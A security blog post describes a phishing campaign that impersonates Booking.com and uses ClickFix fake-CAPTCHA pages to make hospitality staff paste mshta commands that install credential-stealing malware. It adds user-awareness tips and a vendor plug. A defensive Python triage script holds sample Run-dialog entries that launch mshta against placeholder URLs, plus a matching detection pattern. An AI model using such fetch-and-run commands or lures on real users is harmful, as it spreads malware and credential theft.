Phishing Campaign Impersonates Booking.com

Deepak Gupta

Co-founder/CEO

 
April 22, 2025

Starting in December 2024, Microsoft Threat Intelligence identified a phishing campaign that impersonates the online travel agency Booking.com. This campaign targets organizations in the hospitality sector, employing a social engineering technique known as ClickFix to deliver credential-stealing malware. As of February 2025, this campaign remains active.

The phishing attack specifically targets individuals in hospitality organizations across North America, Oceania, and Europe. Attackers send fake emails that appear to come from Booking.com, prompting users to address negative guest reviews or verify accounts.

Image: screenshot of an email, courtesy of Microsoft Security Blog

In the ClickFix technique, users are presented with false error messages instructing them to copy, paste, and execute commands. This interaction can bypass standard security features. The phishing emails lead to a fake webpage that mimics Booking.com, displaying a CAPTCHA designed to trick users into executing malicious commands.

Image: screenshot of a fake Booking.com webpage, courtesy of Microsoft Security Blog

The malicious code, executed via mshta.exe, downloads a variety of malware, including XWorm, Lumma stealer, and AsyncRAT, all capable of stealing financial data and credentials.

Recommendations for Defense

Organizations can mitigate the impact of phishing campaigns by educating users to recognize these threats:

  • Verify the sender’s email address.
  • Contact the service provider directly for suspicious messages.
  • Be cautious of urgent calls to action.
  • Hover over links to check the full URL.
  • Look for typos in the email content, which can be indicators of phishing.

For enhanced security, Microsoft recommends implementing phishing-resistant authentication methods and enforcing multi-factor authentication (MFA) across all accounts.

Malware Types Involved

The phishing campaign delivers various malware families:

  • XWorm: A remote access trojan that allows the attacker to take control of the victim's device.
  • Lumma Stealer: Focused on stealing sensitive information.
  • AsyncRAT: A remote access trojan known for its ability to capture keystrokes and access files.

Microsoft Defender Antivirus detects these threats as follows:

ClickFix Technique Explained

The ClickFix technique is a sophisticated method used in this phishing campaign. Users are misled into executing malicious commands by following instructions embedded in fake CAPTCHA pages.

Image: screenshot, courtesy of Microsoft Security Blog

When users copy and paste the commands into the Windows Run dialog, it can lead to the installation of various malware types. This tactic shows the evolving nature of phishing attacks and highlights the need for robust cybersecurity measures.
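A defender's triage check for the Run dialog step described above, as an added example that is not part of the original article or of Microsoft's report: Windows records commands typed into the Run dialog under the per-user RunMRU registry key, and this script flags history entries that start mshta.exe with a remote URL. The registry location is background knowledge rather than something the article states; the sample data, host names and function names are constructed for illustration.

```python
import re

# Run dialog history lives in the per-user registry key
#   HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
# Values a, b, c, ... each hold one typed command followed by the suffix "\1";
# the MRUList value lists those names, most recent first.

# Constructed sample of an exported RunMRU key (value name -> data).
SAMPLE_RUNMRU = {
    "MRUList": "edcba",
    "a": "cmd\\1",
    "b": "https://intranet.example.invalid/rooms\\1",
    "c": "C:\\Windows\\System32\\mshta.exe http://captcha.example.invalid/v\\1",
    "d": "notepad C:\\Users\\frontdesk\\notes.txt\\1",
    "e": "MsHtA.exe https://verify.example.invalid/check\\1",
}

# mshta as a program token (any case, optional .exe, optional path prefix).
MSHTA = re.compile(r"(?i)(?<![\w-])mshta(?:\.exe)?(?![\w.-])")
URL = re.compile(r"(?i)\bhttps?://[^\s\"']+")


def ordered_commands(runmru):
    """Typed commands, most recent first, with the trailing '\\1' removed."""
    commands = []
    for name in runmru.get("MRUList", ""):
        data = runmru.get(name)
        if data is None:          # MRUList can name a value that was deleted
            continue
        commands.append(data[:-2] if data.endswith("\\1") else data)
    return commands


def flag_mshta_remote(runmru):
    """Return (rank, command, url) for entries that start mshta with a URL."""
    hits = []
    for rank, command in enumerate(ordered_commands(runmru)):
        url = URL.search(command)
        if url and MSHTA.search(command):
            hits.append((rank, command, url.group(0)))
    return hits


if __name__ == "__main__":
    for rank, command, url in flag_mshta_remote(SAMPLE_RUNMRU):
        print(f"rank {rank}: {command!r} -> {url}")
```

On a live Windows host the same dictionary can be built from the key with Python's standard-library winreg module. A hit is a lead for investigation of that user's session, not proof of compromise.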

Implications for Cybersecurity Marketing

For companies in the cybersecurity sector, such as GrackerAI, there is a significant opportunity to address these emerging threats through targeted content marketing and threat monitoring. By leveraging insights from such phishing campaigns, GrackerAI can help organizations create relevant marketing materials and educate their audiences on the latest cybersecurity threats. GrackerAI is an AI-powered cybersecurity marketing platform designed to assist organizations in transforming security news into strategic content opportunities. It enables marketing teams to identify emerging trends, monitor threats, and produce technically relevant content that resonates with cybersecurity professionals. Explore our services at GrackerAI to enhance your cybersecurity marketing strategy.


Deepak Gupta is a technology leader with deep experience in enterprise software, identity systems, and security-focused platform architecture. Having led CIAM and authentication products at a senior level, he brings strong expertise in building scalable, secure, and developer-ready systems. At Gracker, his work focuses on applying AI to simplify complex technical workflows while maintaining the accuracy, reliability, and trust required in cybersecurity and B2B environments.
